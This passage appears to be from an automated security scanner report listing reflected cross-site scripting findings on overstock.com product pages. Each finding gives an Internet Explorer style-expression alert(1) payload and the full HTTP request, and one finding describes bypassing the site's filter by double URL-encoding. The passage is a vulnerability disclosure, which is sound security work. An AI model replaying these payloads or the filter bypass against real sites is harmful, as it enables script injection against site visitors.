GET /Electronics/Lithium-Coin-Battery-CR2032-Pack-of-5/3521764/product.html?ff271"style%3d"x%3aexpression(alert(1))"32c240f2498=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.98. http://www.overstock.com/Electronics/Samsung-DVD-V9800-1080p-Upconverting-DVD-VCR-Player-Refurbished/5131876/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b94c4"style%3d"x%3aexpression(alert(1))"ef952e6335 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b94c4"style="x:expression(alert(1))"ef952e6335 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Electronics/Samsung-DVD-V9800-1080p-Upconverting-DVD-VCR-Player-Refurbished/5131876/product.html?b94c4"style%3d"x%3aexpression(alert(1))"ef952e6335=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.99. http://www.overstock.com/Electronics/SanDisk-4GB-SDHC-Memory-Card/2576616/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f8e7"style%3d"x%3aexpression(alert(1))"b5269568014 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f8e7"style="x:expression(alert(1))"b5269568014 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Electronics/SanDisk-4GB-SDHC-Memory-Card/2576616/product.html?9f8e7"style%3d"x%3aexpression(alert(1))"b5269568014=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.100. http://www.overstock.com/Electronics/SanDisk-8GB-SDHC-Memory-Card/3158547/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e49ec"style%3d"x%3aexpression(alert(1))"8a5595016dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e49ec"style="x:expression(alert(1))"8a5595016dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Electronics/SanDisk-8GB-SDHC-Memory-Card/3158547/product.html?e49ec"style%3d"x%3aexpression(alert(1))"8a5595016dc=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.101. http://www.overstock.com/Electronics/SanDisk-Sansa-Fuze-4GB-MP3-Player-Refurbished/4342765/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea2c2"style%3d"x%3aexpression(alert(1))"84955bdb5b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ea2c2"style="x:expression(alert(1))"84955bdb5b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Electronics/SanDisk-Sansa-Fuze-4GB-MP3-Player-Refurbished/4342765/product.html?ea2c2"style%3d"x%3aexpression(alert(1))"84955bdb5b4=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.102. http://www.overstock.com/Electronics/Textured-Silicone-Skin-Case-for-Apple-iPhone/3889200/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff07e"style%3d"x%3aexpression(alert(1))"6838bc39a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ff07e"style="x:expression(alert(1))"6838bc39a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Electronics/Textured-Silicone-Skin-Case-for-Apple-iPhone/3889200/product.html?ff07e"style%3d"x%3aexpression(alert(1))"6838bc39a=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.103. http://www.overstock.com/Electronics/TomTom-ONE-140S-GPS-Navigation-System-with-Bonus-Kit-New-in-Non-Retail-Packaging/4714183/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 134ae"style%3d"x%3aexpression(alert(1))"050d7f052a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 134ae"style="x:expression(alert(1))"050d7f052a0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Electronics/TomTom-ONE-140S-GPS-Navigation-System-with-Bonus-Kit-New-in-Non-Retail-Packaging/4714183/product.html?134ae"style%3d"x%3aexpression(alert(1))"050d7f052a0=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.104. http://www.overstock.com/Eziba/Cozumel-Chaise/4893252/product.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.overstock.com
Path:
/Eziba/Cozumel-Chaise/4893252/product.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50a5c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522e0c993399bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 50a5c"style="x:expression(alert(1))"e0c993399bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Eziba/Cozumel-Chaise/4893252/product.html?50a5c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522e0c993399bf=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.105. http://www.overstock.com/Gifts-Flowers/Armarkat-Cozy-20-inch-Mocha-and-Beige-Pet-Bed/4413829/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ce38"style%3d"x%3aexpression(alert(1))"74566734d36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3ce38"style="x:expression(alert(1))"74566734d36 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Gifts-Flowers/Armarkat-Cozy-20-inch-Mocha-and-Beige-Pet-Bed/4413829/product.html?3ce38"style%3d"x%3aexpression(alert(1))"74566734d36=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.106. http://www.overstock.com/Gifts-Flowers/Armarkat-Slipper-shaped-Mocha-Pet-Bed/4415728/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f94e1"style%3d"x%3aexpression(alert(1))"8825e2ad130 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f94e1"style="x:expression(alert(1))"8825e2ad130 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Gifts-Flowers/Armarkat-Slipper-shaped-Mocha-Pet-Bed/4415728/product.html?f94e1"style%3d"x%3aexpression(alert(1))"8825e2ad130=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.107. http://www.overstock.com/Gifts-Flowers/Cat-Tree-Condo-House-Scratcher-72-inch-Furniture/5098578/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da40d"style%3d"x%3aexpression(alert(1))"40d931848fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as da40d"style="x:expression(alert(1))"40d931848fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Gifts-Flowers/Cat-Tree-Condo-House-Scratcher-72-inch-Furniture/5098578/product.html?da40d"style%3d"x%3aexpression(alert(1))"40d931848fb=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.108. http://www.overstock.com/Gifts-Flowers/Extra-Large-Lounger-Dog-Pet-Bed/2684796/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de180"style%3d"x%3aexpression(alert(1))"452ca6d83aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as de180"style="x:expression(alert(1))"452ca6d83aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Gifts-Flowers/Extra-Large-Lounger-Dog-Pet-Bed/2684796/product.html?de180"style%3d"x%3aexpression(alert(1))"452ca6d83aa=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.109. http://www.overstock.com/Gifts-Flowers/Hill-Dale-Universal-Fit-Black-Seat-Cover/1562292/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 984b8"style%3d"x%3aexpression(alert(1))"5b593c816ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 984b8"style="x:expression(alert(1))"5b593c816ca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Gifts-Flowers/Hill-Dale-Universal-Fit-Black-Seat-Cover/1562292/product.html?984b8"style%3d"x%3aexpression(alert(1))"5b593c816ca=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.110. http://www.overstock.com/Gifts-Flowers/Large-35-x-46-Super-Value-Dog-Pet-Bed/2897134/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee5f8"style%3d"x%3aexpression(alert(1))"73f60b7f756 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee5f8"style="x:expression(alert(1))"73f60b7f756 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Gifts-Flowers/Large-35-x-46-Super-Value-Dog-Pet-Bed/2897134/product.html?ee5f8"style%3d"x%3aexpression(alert(1))"73f60b7f756=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.111. http://www.overstock.com/Gifts-Flowers/Large-40-inch-Round-Padded-edge-Dog-Bed/2682544/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5879"style%3d"x%3aexpression(alert(1))"060fcf6f53d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f5879"style="x:expression(alert(1))"060fcf6f53d in the application's response.
